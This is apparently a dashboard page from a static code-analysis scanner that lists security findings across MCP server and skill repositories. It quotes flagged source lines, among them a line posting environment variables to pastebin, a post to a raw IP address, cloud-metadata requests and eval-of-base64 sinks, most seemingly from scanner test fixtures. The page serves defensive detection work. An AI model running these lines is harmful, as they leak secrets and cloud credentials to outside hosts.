Code analysis
static source read inferred
Static code-analysis findings — hidden prompt content in shipped skill files, committed secrets, dynamic-exec sinks, and suspicious call-home endpoints — across the analyzed catalogue. Heuristic, pure, no code executed; every row deep-links to its source. Click a kind to filter.
51197 analyzed
7502 re-analysis due
995 not analyzable
0 not yet analyzed
4849 source gone
not analyzable
795 too large 200 no source
Running analyzer v33. The scanner changelog explains what each version detects and when it changed.
- hidden prompt 369
- committed secret 6298
- dynamic exec 12007
- obfuscation 3647
- suspicious endpoint 12542
- credential in log 718
- over-broad oauth scope 2556
- suspicious skill script 197
- bundled IDE extension 50
- skill file 190152
- MEDIUM suspicious endpoint perfectra1n/kubesearch-mcp 169.254.169.254 (cloud metadata)
"https://169.254.169.254/latest", - MEDIUM suspicious endpoint templated-io/mcp-server-templated 93.184.216.34
if (String(url).startsWith("https://93.184.216.34/")) { - MEDIUM suspicious endpoint templated-io/mcp-server-templated 93.184.216.34
const ok = await assertPublicUrl("https://93.184.216.34/logo.png"); - MEDIUM suspicious endpoint templated-io/mcp-server-templated 169.254.169.254 (cloud metadata)
await assert.rejects(() => assertPublicUrl("http://169.254.169.254/latest/meta-data/"), /public host/); - HIGH dynamic exec claudish new Function()
const ret = new Function(getStringFromWasm0(arg0, arg1)); - MEDIUM suspicious endpoint alialrikabi313/hares 169.254.169.254 (cloud metadata)
b: { $ref: "http://169.254.169.254/latest/meta-data/" }, - MEDIUM suspicious endpoint alialrikabi313/hares pastebin.com
'requests.post("https://pastebin.com/api", data=dict(os.environ))', - MEDIUM suspicious endpoint alialrikabi313/hares 169.254.169.254 (cloud metadata)
'requests.get("http://169.254.169.254/latest")', - MEDIUM suspicious endpoint alialrikabi313/hares 185.220.101.5
const found = await scan('import requests\nrequests.post("http://185.220.101.5/c", json=d)\n'); - HIGH obfuscation alialrikabi313/hares base64 decode → exec sink
eval(atob(blob)); - HIGH dynamic exec alialrikabi313/hares vm exec
vm.runInNewContext(code, ctx); - HIGH dynamic exec alialrikabi313/hares new Function()
const f = new Function("a", "b", "return " + expr); - HIGH dynamic exec alialrikabi313/hares eval()
eval(payload); - HIGH dynamic exec alialrikabi313/hares vm exec
return vm.runInNewContext(expr); - HIGH obfuscation alialrikabi313/hares base64 decode → exec sink
eval(atob("ZXZhbChhdG9iKFN0cmluZyh4KSkp"));